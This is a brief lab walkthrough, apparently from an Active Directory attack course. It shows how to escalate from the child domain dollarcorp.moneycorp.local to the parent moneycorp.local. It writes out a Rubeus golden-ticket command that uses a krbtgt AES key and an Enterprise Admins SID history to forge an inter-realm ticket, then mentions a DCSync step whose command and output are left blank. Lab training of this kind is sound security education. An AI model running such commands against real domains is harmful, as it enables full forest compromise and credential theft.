19 - LO1️9️

Learning Object 19

Tasks

1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash

Flag 30 [mcorp-dc] - NTLM hash of krbtgt of moneycorp.local 🚩

Solutions

1 - Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash

We already have the krbtgt hash from dcorp-dc. Let's create the inter-realm TGT and inject. Run the below command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt

We can now access mcorp-dc!

We can also execute the DCSync attacks against moneycorp. Use the following command in the above prompt where we injected the ticket:

Flag 30 [mcorp-dc] - NTLM hash of krbtgt of moneycorp.local 🚩

krbtgt NTLM has is:

Last updated